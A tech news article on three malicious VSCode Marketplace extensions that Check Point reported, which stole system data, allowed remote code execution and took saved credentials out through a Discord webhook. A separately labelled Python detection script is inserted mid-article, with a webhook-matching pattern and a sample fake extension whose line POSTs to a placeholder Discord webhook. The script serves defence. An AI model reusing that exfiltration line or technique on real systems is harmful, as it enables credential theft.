Hackers are using malicious Microsoft VSCode extensions to steal passwords


Cybersecurity researchers from Check Point have discovered multiple malicious Visual Studio Code extensions sitting in Microsoft’s VSCode Marketplace.

These extensions, called “Theme Darcula dark”, “python-vscode”, and “prettiest java”, each pretended to be useful for Visual Studio Code developers but were, in fact, doing all kinds of nasties. Theme Darcula dark was stealing basic system information, python-vscode allowed for remote code execution on the infected endpoint, while prettiest java (impersonating the legitimate "pretty java" add-on) stole saved credentials or authentication tokens from Discord and Discord Canary, Google Chrome, Opera, Brave Browser, and Yandex Browser. The malware would later exfiltrate them using a Discord webhook.

Combined, the three malicious extensions were downloaded 46,600 times, although, among the three, Theme Darcula dark absolutely dominated with more than 45,000 downloads.

Supply chain attacks

The researchers tipped Microsoft off on May 4 this year, and the company removed them ten days later, on May 14. It’s important to mention that while the removal of the malware from the repository does protect developers from future downloads, those that downloaded the malware in the past will remain vulnerable until they remove the tools from their systems and run an antivirus scan to eliminate any remnants.
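A defender's triage script, added here and not part of the article or of Check Point's research: it walks the per-user VS Code extension directory (assumed to be ~/.vscode/extensions, one folder per extension with a package.json manifest), flags the three display names named above, and flags any extension whose JavaScript contains a Discord webhook URL, the exfiltration channel the article describes. The sample extension tree it builds is constructed for the demonstration and the webhook in it is a placeholder.

```python
import json
import re
import tempfile
from pathlib import Path

# Display names of the three extensions the article says Check Point reported.
KNOWN_BAD_NAMES = {"theme darcula dark", "python-vscode", "prettiest java"}
# The exfiltration channel the article describes: a Discord webhook URL.
WEBHOOK_RE = re.compile(r"https?://(?:\w+\.)?discord(?:app)?\.com/api/webhooks/\S+", re.I)


def scan_extensions(root: Path) -> list:
    """Walk <root>/*/package.json (one manifest per installed extension) and return
    a finding per extension whose display name matches a reported one or whose
    JavaScript contains a Discord webhook URL."""
    findings = []
    for manifest in sorted(root.glob("*/package.json")):
        try:
            meta = json.loads(manifest.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest: skip it, keep sweeping
        ext_dir = manifest.parent
        name = str(meta.get("displayName") or meta.get("name") or ext_dir.name)
        reasons = []
        if name.strip().lower() in KNOWN_BAD_NAMES:
            reasons.append("display name matches a reported malicious extension")
        for js in ext_dir.rglob("*.js"):
            if WEBHOOK_RE.search(js.read_text(encoding="utf-8", errors="ignore")):
                reasons.append(f"Discord webhook URL in {js.relative_to(ext_dir)}")
                break
        if reasons:
            findings.append({"dir": ext_dir.name, "name": name, "reasons": reasons})
    return findings


def build_sample_extensions() -> Path:
    """Constructed sample tree (fake extensions, placeholder webhook) for an offline run."""
    root = Path(tempfile.mkdtemp(prefix="vsc-ext-"))
    samples = {
        "legit.pretty-java-1.0.0": ("pretty java", "module.exports = {};"),
        "evil.prettiest-java-0.0.1": ("prettiest java",
            "fetch('https://discord.com/api/webhooks/000/PLACEHOLDER',{method:'POST'});"),
        "evil.theme-darcula-dark-1.0.0": ("Theme Darcula dark", "exports.activate=()=>{};"),
    }
    for folder, (display, src) in samples.items():
        (root / folder).mkdir()
        (root / folder / "package.json").write_text(json.dumps({"displayName": display}))
        (root / folder / "extension.js").write_text(src)
    return root
```

For a real sweep call `scan_extensions(Path.home() / ".vscode" / "extensions")` and review each finding by hand; a name match alone is a lead, not proof, since a benign extension can reuse a name.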

Visual Studio Code (VSC) is Microsoft’s source-code editor, used by a “significant percentage” of professional software developers worldwide. VSCode Marketplace is an extensions market run by the Redmond software giant, which allegedly hosts more than 50,000 add-ons that improve VSC’s functionality in various ways. 

While these three were conclusively malicious, Check Point’s researchers found more dubious add-ons which demonstrated some unsafe behavior, but couldn’t outright be classified as malicious. Some of that behavior included grabbing code from private repositories, or downloading files. 

Supply chain attacks are super popular among threat actors these days, and open-source repositories are an attractive target. Other repositories, such as PyPI, for example, are bombarded with malicious packages on a daily basis.

Via: BleepingComputer

Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.
